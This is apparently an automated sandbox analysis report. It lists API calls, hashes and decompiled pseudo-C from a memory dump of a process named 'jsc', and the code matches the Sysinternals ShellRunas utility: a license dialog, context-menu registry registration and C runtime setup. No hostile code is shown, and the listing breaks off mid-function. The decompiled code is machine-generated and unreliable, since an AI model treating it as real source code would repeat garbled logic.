                                                          0x0040b0d6
                                                          0x00000000
                                                          0x0040b0d2
                                                          0x0040b032
                                                          0x0040b033
                                                          0x0040b038
                                                          0x0040b039
                                                          0x0040b03b
                                                          0x0040b040
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040b040
                                                          0x0040b023
                                                          0x0040b000
                                                          0x0040af53
                                                          0x0040af57
                                                          0x00000000
                                                          0x0040af73
                                                          0x0040af74
                                                          0x0040af79
                                                          0x0040af81
                                                          0x0040af89
                                                          0x0040af8e
                                                          0x0040af96
                                                          0x0040afa3
                                                          0x0040afac
                                                          0x0040afb4
                                                          0x0040afb5
                                                          0x0040afb7
                                                          0x0040afb8
                                                          0x0040afb9
                                                          0x0040afba
                                                          0x0040afbb
                                                          0x0040afbc
                                                          0x0040afc1
                                                          0x0040afc1
                                                          0x0040afc8
                                                          0x0040afd3
                                                          0x0040afdb
                                                          0x0040afe0
                                                          0x0040aff1
                                                          0x0040aff1
                                                          0x0040afe0
                                                          0x00000000
                                                          0x0040afc8

                                                          APIs
                                                          • LoadLibraryA.KERNEL32(USER32.DLL,00000000,00000000,00000314,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 0040AF4D
                                                          • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040AF69
                                                            • Part of subcall function 004063CC: TlsGetValue.KERNEL32(00000000,00406441,00000000,0040AF2E,00000000,00000000,00000314,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 004063D9
                                                            • Part of subcall function 004063CC: TlsGetValue.KERNEL32(FFFFFFFF,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 004063F0
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AF86
                                                            • Part of subcall function 004063CC: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 00406405
                                                            • Part of subcall function 004063CC: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00406420
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AF9B
                                                          • __invoke_watson.LIBCMT ref: 0040AFBC
                                                            • Part of subcall function 00405700: _memset.LIBCMT ref: 0040578C
                                                            • Part of subcall function 00405700: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 004057AA
                                                            • Part of subcall function 00405700: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 004057B4
                                                            • Part of subcall function 00405700: UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 004057BE
                                                            • Part of subcall function 00405700: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 004057D9
                                                            • Part of subcall function 00405700: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 004057E0
                                                            • Part of subcall function 00406443: TlsGetValue.KERNEL32(?,00406ED3,004035FD,?,?,00401E38,00000000,?,?), ref: 00406450
                                                            • Part of subcall function 00406443: TlsGetValue.KERNEL32(FFFFFFFF,?,00401E38,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00406467
                                                            • Part of subcall function 00406443: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,00401E38,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0040647C
                                                            • Part of subcall function 00406443: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00406497
                                                          • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 0040AFD0
                                                          • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0040AFE8
                                                          • __invoke_watson.LIBCMT ref: 0040B05B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_jsc.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$Value$ExceptionFilterHandleModuleProcessUnhandled__invoke_watson$CurrentDebuggerLibraryLoadPresentTerminate_memset
                                                          • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                          • API String ID: 2940365033-232180764
                                                          • Opcode ID: 9dc9d6c9699a12b4101e6e517c17312217e972a6e614ab9b554892a8391cc6b4
                                                          • Instruction ID: 1c028cbe132dd73ef92918e8f78929fa75bbb1dd901022f9e38424cc5d2cf97e
                                                          • Opcode Fuzzy Hash: 9dc9d6c9699a12b4101e6e517c17312217e972a6e614ab9b554892a8391cc6b4
                                                          • Instruction Fuzzy Hash: E94164B1D05205AACF20AFB59C85D6FBBA8EE44314F11493FE811F22D1DB3D89548B9E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 88%
                                                          			E00401310(WCHAR* __edx, void* __ebp, void* __fp0, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
                                                          				signed int _v4;
                                                          				short _v524;
                                                          				intOrPtr _v528;
                                                          				int _v532;
                                                          				void* _v536;
                                                          				void* _v540;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t15;
                                                          				void* _t18;
                                                          				struct HBRUSH__* _t29;
                                                          				void* _t31;
                                                          				void* _t33;
                                                          				void* _t35;
                                                          				struct HWND__* _t48;
                                                          				signed int _t52;
                                                          
                                                          				_t46 = __edx;
                                                          				_t52 =  &_v540;
                                                          				_t15 =  *0x413004; // 0xf284055d
                                                          				_v4 = _t15 ^ _t52;
                                                          				_t18 = _a8 - 0x110;
                                                          				_t42 = _a16;
                                                          				_t48 = _a4;
                                                          				if(_t18 == 0) {
                                                          					_push(__ebp);
                                                          					_t47 = E00401220();
                                                          					_v540 = _t47;
                                                          					_v536 =  &_v540;
                                                          					_v532 = 0;
                                                          					_v528 = E004012C0;
                                                          					E00403227(_t48,  &_v524, L"%s License Agreement", _t42);
                                                          					_t46 =  &_v524;
                                                          					SetWindowTextW(_t48,  &_v524);
                                                          					_t42 = GetDlgItem;
                                                          					SendMessageW(GetDlgItem(_t48, 0x1f4), 0x435, 0, 0x100000);
                                                          					SendMessageW(GetDlgItem(_t48, 0x1f4), 0x449, 2,  &_v536);
                                                          					_push(_t47);
                                                          					E00403199(GetDlgItem,  &_v524,  &_v524, _t47, _t48, __eflags);
                                                          					_t52 = _t52 + 0x10;
                                                          					goto L13;
                                                          				} else {
                                                          					_t31 = _t18 - 1;
                                                          					if(_t31 == 0) {
                                                          						_t33 = (_a12 & 0x0000ffff) - 1;
                                                          						__eflags = _t33;
                                                          						if(_t33 == 0) {
                                                          							EndDialog(_t48, 1);
                                                          							goto L13;
                                                          						} else {
                                                          							_t35 = _t33 - 1;
                                                          							__eflags = _t35;
                                                          							if(_t35 == 0) {
                                                          								EndDialog(_t48, 0);
                                                          								goto L13;
                                                          							} else {
                                                          								__eflags = _t35 - 0x1f3;
                                                          								if(__eflags == 0) {
                                                          									_t47 = GetDlgItem(_t48, 0x1f4);
                                                          									E00401000(_t38, __eflags);
                                                          									L13:
                                                          									_t29 = 1;
                                                          								} else {
                                                          									goto L8;
                                                          								}
                                                          							}
                                                          						}
                                                          					} else {
                                                          						if(_t31 != 0x27 || _t42 != GetDlgItem(_t48, 0x1f4)) {
                                                          							L8:
                                                          							_t29 = 0;
                                                          						} else {
                                                          							_t29 = GetSysColorBrush(5);
                                                          						}
                                                          					}
                                                          				}
                                                          				return E0040318A(_t29, _t42, _v4 ^ _t52, _t46, _t47, _t48);
                                                          			}




















                                                          0x00401310
                                                          0x00401310
                                                          0x00401316
                                                          0x0040131d
                                                          0x0040132b
                                                          0x00401331
                                                          0x00401339
                                                          0x00401341
                                                          0x004013be
                                                          0x004013c5
                                                          0x004013d5
                                                          0x004013d9
                                                          0x004013dd
                                                          0x004013e5
                                                          0x004013ed
                                                          0x004013f5
                                                          0x004013fb
                                                          0x00401401
                                                          0x00401422
                                                          0x00401439
                                                          0x0040143b
                                                          0x0040143c
                                                          0x00401441
                                                          0x00000000
                                                          0x00401343
                                                          0x00401343
                                                          0x00401346
                                                          0x00401372
                                                          0x00401372
                                                          0x00401375
                                                          0x004013b3
                                                          0x00000000
                                                          0x00401377
                                                          0x00401377
                                                          0x00401377
                                                          0x0040137a
                                                          0x004013a5
                                                          0x00000000
                                                          0x0040137c
                                                          0x0040137c
                                                          0x00401381
                                                          0x00401396
                                                          0x00401398
                                                          0x00401445
                                                          0x00401445
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00401381
                                                          0x0040137a
                                                          0x00401348
                                                          0x0040134b
                                                          0x00401383
                                                          0x00401383
                                                          0x0040135d
                                                          0x0040135f
                                                          0x0040135f
                                                          0x0040134b
                                                          0x00401346
                                                          0x00401461

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_jsc.jbxd
                                                          Similarity
                                                          • API ID: Item$MessageSend$BrushColorDialogTextWindow__swprintf
                                                          • String ID: %s License Agreement
                                                          • API String ID: 2951897483-1285993597
                                                          • Opcode ID: b222d6317158b18de7cdf78b0e5675ac59ac6db589ad6d1fb58f5eea72f61197
                                                          • Instruction ID: 1530dd87393cf7f224303f11dcabdbff35385f3a88108dc3a53a8d27bff466c6
                                                          • Opcode Fuzzy Hash: b222d6317158b18de7cdf78b0e5675ac59ac6db589ad6d1fb58f5eea72f61197
                                                          • Instruction Fuzzy Hash: D031F6715843016BD310AFA89D49FAF76D8AB8C708F10493EF645B62E0DB7CDA05866F
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 95%
                                                          			E00401BA0(void* __eax, void* __esi, void* __eflags, char _a4) {
                                                          				void* __ebx;
                                                          				struct HWND__* _t9;
                                                          				struct HWND__* _t16;
                                                          				void* _t17;
                                                          				void* _t20;
                                                          				void* _t21;
                                                          
                                                          				_t17 = __esi;
                                                          				_t12 = __eax;
                                                          				_t16 = E004019F0(__eax, L".exe", L"Software\\Classes\\SystemFileAssociations");
                                                          				_t21 = _t20 + 4;
                                                          				if(_t16 != 0) {
                                                          					L5:
                                                          					if(_a4 != 0) {
                                                          						_push(_t17);
                                                          						E00401880(L"Error registering context menu hander", _t16);
                                                          						_t21 = _t21 + 4;
                                                          					}
                                                          					E00401930(0);
                                                          					return _t16;
                                                          				}
                                                          				_t16 = E004019F0(_t12, L"lnkfile", L"Software\\Classes");
                                                          				_t21 = _t21 + 4;
                                                          				if(_t16 != 0) {
                                                          					goto L5;
                                                          				}
                                                          				_t9 = E004019F0(_t12, L".msc", L"Software\\Classes\\SystemFileAssociations");
                                                          				_t16 = _t9;
                                                          				_t21 = _t21 + 4;
                                                          				if(_t16 != 0) {
                                                          					goto L5;
                                                          				}
                                                          				if(_a4 == _t9) {
                                                          					return _t9;
                                                          				} else {
                                                          					MessageBoxW(_t9, L"ShellRunas context menu handler successfully registered.", L"ShellRunas - Sysinternals: www.sysinternals.com", 0x40);
                                                          					return _t16;
                                                          				}
                                                          			}









                                                          0x00401ba0
                                                          0x00401ba2
                                                          0x00401bb3
                                                          0x00401bb5
                                                          0x00401bba
                                                          0x00401c0a
                                                          0x00401c0f
                                                          0x00401c11
                                                          0x00401c18
                                                          0x00401c1d
                                                          0x00401c20
                                                          0x00401c23
                                                          0x00000000
                                                          0x00401c2b
                                                          0x00401bcb
                                                          0x00401bcd
                                                          0x00401bd2
                                                          0x00000000
                                                          0x00000000
                                                          0x00401bde
                                                          0x00401be3
                                                          0x00401be5
                                                          0x00401bea
                                                          0x00000000
                                                          0x00000000
                                                          0x00401bf0
                                                          0x00401c2f
                                                          0x00401bf2
                                                          0x00401bff
                                                          0x00401c09
                                                          0x00401c09

                                                          APIs
                                                            • Part of subcall function 004019F0: RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000004,00000000,?,00000000,?), ref: 00401A2C
                                                            • Part of subcall function 004019F0: RegCreateKeyExW.ADVAPI32(?,.exe,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00401A49
                                                            • Part of subcall function 004019F0: RegCreateKeyExW.ADVAPI32(?,Shell,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00401A76
                                                            • Part of subcall function 004019F0: RegCreateKeyExW.ADVAPI32(?,Run as different user (netonly)...,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00401AA7
                                                            • Part of subcall function 004019F0: RegCreateKeyExW.ADVAPI32(?,Command,00000000,00000000,00000000,00000006,00000000,?,00000000), ref: 00401AC9
                                                            • Part of subcall function 004019F0: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401AE0
                                                            • Part of subcall function 004019F0: _swprintf.LIBCMT ref: 00401B1A
                                                            • Part of subcall function 004019F0: RegSetValueW.ADVAPI32(?,00000000,00000001,?), ref: 00401B54
                                                            • Part of subcall function 004019F0: RegCloseKey.ADVAPI32(?), ref: 00401B61
                                                            • Part of subcall function 004019F0: RegCloseKey.ADVAPI32(?), ref: 00401B68
                                                            • Part of subcall function 004019F0: RegCloseKey.ADVAPI32(?), ref: 00401B6F
                                                            • Part of subcall function 004019F0: RegCloseKey.ADVAPI32(?), ref: 00401B76
                                                            • Part of subcall function 004019F0: RegCloseKey.ADVAPI32(?), ref: 00401B7D
                                                          • MessageBoxW.USER32(00000000,ShellRunas context menu handler successfully registered.,ShellRunas - Sysinternals: www.sysinternals.com,00000040), ref: 00401BFF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_jsc.jbxd
                                                          Similarity
                                                          • API ID: CloseCreate$FileMessageModuleNameValue_swprintf
                                                          • String ID: .exe$.msc$Error registering context menu hander$ShellRunas - Sysinternals: www.sysinternals.com$ShellRunas context menu handler successfully registered.$Software\Classes$Software\Classes\SystemFileAssociations$lnkfile
                                                          • API String ID: 23047349-2855299177
                                                          • Opcode ID: 0d7b3cff5730ebffb2b1ca40e72fbba3252ccff6b5cd4318ad2bd8684b1371f8
                                                          • Instruction ID: d48563127560b7a8e7189787d004048206fac3746307ea1a651a0f4517783a92
                                                          • Opcode Fuzzy Hash: 0d7b3cff5730ebffb2b1ca40e72fbba3252ccff6b5cd4318ad2bd8684b1371f8
                                                          • Instruction Fuzzy Hash: F8F0A7B5AC430422F3112296290279B114587D17B5F1C407BFE55773F3D97CC885826E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 82%
                                                          			E00401880(void* __esi, long _a4) {
                                                          				signed int _v4;
                                                          				short _v516;
                                                          				short _v520;
                                                          				signed int _t8;
                                                          				long _t10;
                                                          				void* _t19;
                                                          				void* _t26;
                                                          				signed int _t28;
                                                          				signed int _t29;
                                                          
                                                          				_t27 = __esi;
                                                          				_t28 =  &_v520;
                                                          				_t8 =  *0x413004; // 0xf284055d
                                                          				_v4 = _t8 ^ _t28;
                                                          				_t10 = _a4;
                                                          				if(_t10 == 0) {
                                                          					E004032BD( &_v516, 0x100, L"%s.", __esi);
                                                          					_t29 = _t28 + 0x10;
                                                          				} else {
                                                          					FormatMessageW(0x1100, 0, _t10, 0x400,  &_v520, 0, 0);
                                                          					_push(_v520);
                                                          					E004032BD( &_v516, 0x100, L"%s:\n%s", __esi);
                                                          					_t29 = _t28 + 0x14;
                                                          				}
                                                          				MessageBoxW(0,  &_v516, L"ShellRunas - Sysinternals: www.sysinternals.com", 0x10);
                                                          				return E0040318A(LocalFree(_v520), _t19, _v4 ^ _t29,  &_v516, _t26, _t27);
                                                          			}












                                                          0x00401880
                                                          0x00401880
                                                          0x00401886
                                                          0x0040188d
                                                          0x00401894
                                                          0x0040189d
                                                          0x004018e9
                                                          0x004018ee
                                                          0x0040189f
                                                          0x004018b5
                                                          0x004018be
                                                          0x004018cf
                                                          0x004018d4
                                                          0x004018d4
                                                          0x004018ff
                                                          0x00401923

                                                          APIs
                                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000), ref: 004018B5
                                                          • _swprintf.LIBCMT ref: 004018CF
                                                            • Part of subcall function 004032BD: __vswprintf_s_l.LIBCMT ref: 004032D0
                                                          • _swprintf.LIBCMT ref: 004018E9
                                                          • MessageBoxW.USER32(00000000,?,ShellRunas - Sysinternals: www.sysinternals.com,00000010), ref: 004018FF
                                                          • LocalFree.KERNEL32(00000000), ref: 00401909
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_jsc.jbxd
                                                          Similarity
                                                          • API ID: Message_swprintf$FormatFreeLocal__vswprintf_s_l
                                                          • String ID: %s.$%s:%s$Error launching application$ShellRunas - Sysinternals: www.sysinternals.com
                                                          • API String ID: 1614748391-2411704194
                                                          • Opcode ID: 0d8038b8c8fa5fae2156050a63efd2f74c1b151e05b4e0866b50721f8c9af105
                                                          • Instruction ID: d7ba5e9dad247dd55833599d546a55f01d268ccc4582619336c1b705aef3043d
                                                          • Opcode Fuzzy Hash: 0d8038b8c8fa5fae2156050a63efd2f74c1b151e05b4e0866b50721f8c9af105
                                                          • Instruction Fuzzy Hash: 090188B06443007BE220EB50CC4BFEB7BA8AF5CB51F50892DB659A61C1DBF4A544C75E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 81%
                                                          			E00406529(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                          				struct HINSTANCE__* _t21;
                                                          				intOrPtr _t25;
                                                          				intOrPtr _t29;
                                                          				void* _t34;
                                                          				void* _t36;
                                                          				void* _t37;
                                                          				intOrPtr _t42;
                                                          				void* _t43;
                                                          
                                                          				_t37 = __edx;
                                                          				_t34 = __ecx;
                                                          				_t33 = __ebx;
                                                          				_push(0xc);
                                                          				_push(0x411a98);
                                                          				E00404A88(__ebx, __edi, __esi);
                                                          				_t21 = GetModuleHandleA("KERNEL32.DLL");
                                                          				 *(_t43 - 0x1c) = _t21;
                                                          				_t42 =  *((intOrPtr*)(_t43 + 8));
                                                          				 *((intOrPtr*)(_t42 + 0x5c)) = 0x413990;
                                                          				 *((intOrPtr*)(_t42 + 0x14)) = 1;
                                                          				_t45 = _t21;
                                                          				if(_t21 != 0 && E00406360(_t45, __fp0) != 0) {
                                                          					_t33 = GetProcAddress;
                                                          					 *((intOrPtr*)(_t42 + 0x1f8)) = GetProcAddress( *(_t43 - 0x1c), "EncodePointer");
                                                          					 *((intOrPtr*)(_t42 + 0x1fc)) = GetProcAddress( *(_t43 - 0x1c), "DecodePointer");
                                                          				}
                                                          				 *((intOrPtr*)(_t42 + 0x70)) = 1;
                                                          				 *((char*)(_t42 + 0xc8)) = 0x43;
                                                          				 *((char*)(_t42 + 0x14b)) = 0x43;
                                                          				 *(_t42 + 0x68) = 0x4132a8;
                                                          				InterlockedIncrement(0x4132a8);
                                                          				_push(0xc);
                                                          				E00403F58(_t33, _t34, _t37, 1, _t42);
                                                          				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
                                                          				_t25 =  *((intOrPtr*)(_t43 + 0xc));
                                                          				 *((intOrPtr*)(_t42 + 0x6c)) = _t25;
                                                          				if(_t25 == 0) {
                                                          					_t29 =  *0x4138b0; // 0x4137d8
                                                          					 *((intOrPtr*)(_t42 + 0x6c)) = _t29;
                                                          				}
                                                          				_push( *((intOrPtr*)(_t42 + 0x6c)));
                                                          				E0040619A();
                                                          				_pop(_t36);
                                                          				 *(_t43 - 4) = 0xfffffffe;
                                                          				return E00404ACD(E004065DF(_t36));
                                                          			}











                                                          0x00406529
                                                          0x00406529
                                                          0x00406529
                                                          0x00406529
                                                          0x0040652b
                                                          0x00406530
                                                          0x0040653a
                                                          0x00406540
                                                          0x00406543
                                                          0x00406546
                                                          0x00406550
                                                          0x00406553
                                                          0x00406555
                                                          0x00406568
                                                          0x00406570
                                                          0x00406580
                                                          0x00406580
                                                          0x00406586
                                                          0x00406589
                                                          0x00406590
                                                          0x0040659c
                                                          0x004065a0
                                                          0x004065a6
                                                          0x004065a8
                                                          0x004065ae
                                                          0x004065b2
                                                          0x004065b5
                                                          0x004065ba
                                                          0x004065bc
                                                          0x004065c1
                                                          0x004065c1
                                                          0x004065c4
                                                          0x004065c7
                                                          0x004065cc
                                                          0x004065cd
                                                          0x004065de

                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,00411A98,0000000C,0040663A,00000000,00000000), ref: 0040653A
                                                          • GetProcAddress.KERNEL32(?,EncodePointer), ref: 0040656E
                                                          • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0040657E
                                                          • InterlockedIncrement.KERNEL32(004132A8), ref: 004065A0
                                                          • ___addlocaleref.LIBCMT ref: 004065C7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_jsc.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref
                                                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                          • API String ID: 1389861978-2843748187
                                                          • Opcode ID: d8b2b6e96166e3e6081c3c5c7c145de861ff6874afd2058ea1e84f3c4318444a
                                                          • Instruction ID: 24d076e0758c3fb3c9b827cd62f2c980b6cafb2106825d784225c4fa2649cf60
                                                          • Opcode Fuzzy Hash: d8b2b6e96166e3e6081c3c5c7c145de861ff6874afd2058ea1e84f3c4318444a
                                                          • Instruction Fuzzy Hash: 12116DB1940705AED720AFB69905B5ABBE0AF00314F10853EE99AB62D0DB78A9448F1D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 84%
                                                          			E00407844(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                          				signed int _t61;
                                                          				void* _t64;
                                                          				long _t68;
                                                          				signed int _t71;
                                                          				signed int _t72;
                                                          				int* _t74;
                                                          				signed int* _t77;
                                                          				signed char _t79;
                                                          				long _t86;
                                                          				signed int _t88;
                                                          				int* _t89;
                                                          				signed int _t92;
                                                          				void* _t98;
                                                          				signed int** _t101;
                                                          				signed int _t102;
                                                          				void* _t106;
                                                          				int _t107;
                                                          				int _t109;
                                                          				void** _t112;
                                                          				signed int _t114;
                                                          				void** _t118;
                                                          				void* _t119;
                                                          				void* _t140;
                                                          
                                                          				_t140 = __fp0;
                                                          				_t102 = __edx;
                                                          				_push(0x54);
                                                          				_push(0x411b00);
                                                          				E00404A88(__ebx, __edi, __esi);
                                                          				 *(_t119 - 4) = 0;
                                                          				GetStartupInfoA(_t119 - 0x64);
                                                          				 *(_t119 - 4) = 0xfffffffe;
                                                          				_push(0x38);
                                                          				_t109 = 0x20;
                                                          				_push(_t109);
                                                          				_t61 = E00407C87();
                                                          				if(_t61 == 0) {
                                                          					L45:
                                                          					_t62 = _t61 | 0xffffffff;
                                                          					__eflags = _t61 | 0xffffffff;
                                                          					L46:
                                                          					return E00404ACD(_t62);
                                                          				}
                                                          				 *0x415ae0 = _t61;
                                                          				 *0x415ac8 = _t109;
                                                          				_t4 = _t61 + 0x700; // 0x700
                                                          				_t92 = _t4;
                                                          				while(_t61 < _t92) {
                                                          					 *((char*)(_t61 + 4)) = 0;
                                                          					 *_t61 =  *_t61 | 0xffffffff;
                                                          					 *((char*)(_t61 + 5)) = 0xa;
                                                          					 *((intOrPtr*)(_t61 + 8)) = 0;
                                                          					 *((char*)(_t61 + 0x24)) = 0;
                                                          					 *((char*)(_t61 + 0x25)) = 0xa;
                                                          					 *((char*)(_t61 + 0x26)) = 0xa;
                                                          					_t61 = _t61 + 0x38;
                                                          					_t92 =  *0x415ae0 + 0x700;
                                                          					__eflags = _t92;
                                                          				}
                                                          				if( *((intOrPtr*)(_t119 - 0x32)) == 0) {
                                                          					L26:
                                                          					_t88 = 0;
                                                          					do {
                                                          						_t112 = _t88 * 0x38 +  *0x415ae0;
                                                          						_t64 =  *_t112;
                                                          						if(_t64 == 0xffffffff || _t64 == 0xfffffffe) {
                                                          							_t112[1] = 0x81;
                                                          							__eflags = _t88;
                                                          							if(_t88 != 0) {
                                                          								asm("sbb eax, eax");
                                                          								_t68 =  ~(_t88 - 1) + 0xfffffff5;
                                                          								__eflags = _t68;
                                                          							} else {
                                                          								_t68 = 0xfffffff6;
                                                          							}
                                                          							_t106 = GetStdHandle(_t68);
                                                          							__eflags = _t106 - 0xffffffff;
                                                          							if(_t106 == 0xffffffff) {
                                                          								L42:
                                                          								_t57 =  &(_t112[1]);
                                                          								 *_t57 = _t112[1] | 0x00000040;
                                                          								__eflags =  *_t57;
                                                          								 *_t112 = 0xfffffffe;
                                                          								goto L43;
                                                          							} else {
                                                          								__eflags = _t106;
                                                          								if(_t106 == 0) {
                                                          									goto L42;
                                                          								}
                                                          								_t71 = GetFileType(_t106);
                                                          								__eflags = _t71;
                                                          								if(_t71 == 0) {
                                                          									goto L42;
                                                          								}
                                                          								 *_t112 = _t106;
                                                          								_t72 = _t71 & 0x000000ff;
                                                          								__eflags = _t72 - 2;
                                                          								if(__eflags != 0) {
                                                          									__eflags = _t72 - 3;
                                                          									if(__eflags == 0) {
                                                          										_t52 =  &(_t112[1]);
                                                          										 *_t52 = _t112[1] | 0x00000008;
                                                          										__eflags =  *_t52;
                                                          									}
                                                          								} else {
                                                          									_t112[1] = _t112[1] | 0x00000040;
                                                          								}
                                                          								_push(0xfa0);
                                                          								_t54 =  &(_t112[3]); // -4283092
                                                          								_t61 = E00407B82(_t88, _t102, _t106, _t112, __eflags, _t140);
                                                          								__eflags = _t61;
                                                          								if(_t61 == 0) {
                                                          									goto L45;
                                                          								} else {
                                                          									_t112[2] = _t112[2] + 1;
                                                          									goto L43;
                                                          								}
                                                          							}
                                                          						} else {
                                                          							_t112[1] = _t112[1] | 0x00000080;
                                                          						}
                                                          						L43:
                                                          						_t88 = _t88 + 1;
                                                          					} while (_t88 < 3);
                                                          					SetHandleCount( *0x415ac8);
                                                          					_t62 = 0;
                                                          					goto L46;
                                                          				}
                                                          				_t74 =  *(_t119 - 0x30);
                                                          				if(_t74 == 0) {
                                                          					goto L26;
                                                          				}
                                                          				_t107 =  *_t74;
                                                          				_t89 =  &(_t74[1]);
                                                          				 *(_t119 - 0x1c) = _t89 + _t107;
                                                          				if(_t107 >= 0x800) {
                                                          					_t107 = 0x800;
                                                          				}
                                                          				_t114 = 1;
                                                          				while( *0x415ac8 < _t107) {
                                                          					_t77 = E00407C87(0x20, 0x38);
                                                          					__eflags = _t77;
                                                          					if(__eflags == 0) {
                                                          						_t107 =  *0x415ac8;
                                                          						L17:
                                                          						 *(_t119 - 0x20) =  *(_t119 - 0x20) & 0x00000000;
                                                          						if(_t107 <= 0) {
                                                          							goto L26;
                                                          						} else {
                                                          							goto L18;
                                                          						}
                                                          						do {
                                                          							L18:
                                                          							_t98 =  *( *(_t119 - 0x1c));
                                                          							if(_t98 != 0xffffffff && _t98 != 0xfffffffe) {
                                                          								_t79 =  *_t89;
                                                          								if((_t79 & 0x00000001) == 0) {
                                                          									goto L25;
                                                          								}
                                                          								if((_t79 & 0x00000008) != 0) {
                                                          									L23:
                                                          									_t118 = ( *(_t119 - 0x20) & 0x0000001f) * 0x38 + 0x415ae0[ *(_t119 - 0x20) >> 5];
                                                          									 *_t118 =  *( *(_t119 - 0x1c));
                                                          									_t118[1] =  *_t89;
                                                          									_push(0xfa0);
                                                          									_t39 =  &(_t118[3]); // 0xc
                                                          									_t61 = E00407B82(_t89, _t102, _t107, _t118, _t132, _t140);
                                                          									if(_t61 == 0) {
                                                          										goto L45;
                                                          									}
                                                          									_t118[2] = _t118[2] + 1;
                                                          									goto L25;
                                                          								}
                                                          								_t86 = GetFileType(_t98);
                                                          								_t132 = _t86;
                                                          								if(_t86 == 0) {
                                                          									goto L25;
                                                          								}
                                                          								goto L23;
                                                          							}
                                                          							L25:
                                                          							 *(_t119 - 0x20) =  *(_t119 - 0x20) + 1;
                                                          							_t89 =  &(_t89[0]);
                                                          							 *(_t119 - 0x1c) =  &(( *(_t119 - 0x1c))[1]);
                                                          						} while ( *(_t119 - 0x20) < _t107);
                                                          						goto L26;
                                                          					}
                                                          					_t101 =  &(0x415ae0[_t114]);
                                                          					 *_t101 = _t77;
                                                          					 *0x415ac8 =  *0x415ac8 + 0x20;
                                                          					_t18 =  &(_t77[0x1c0]); // 0x700
                                                          					_t102 = _t18;
                                                          					while(1) {
                                                          						__eflags = _t77 - _t102;
                                                          						if(_t77 >= _t102) {
                                                          							break;
                                                          						}
                                                          						_t77[1] = 0;
                                                          						 *_t77 =  *_t77 | 0xffffffff;
                                                          						_t77[1] = 0xa;
                                                          						_t77[2] = _t77[2] & 0x00000000;
                                                          						_t77[9] = _t77[9] & 0x00000080;
                                                          						_t77[9] = 0xa;
                                                          						_t77[9] = 0xa;
                                                          						_t77 =  &(_t77[0xe]);
                                                          						_t102 =  &(( *_t101)[0x1c0]);
                                                          						__eflags = _t102;
                                                          					}
                                                          					_t114 = _t114 + 1;
                                                          					__eflags = _t114;
                                                          				}
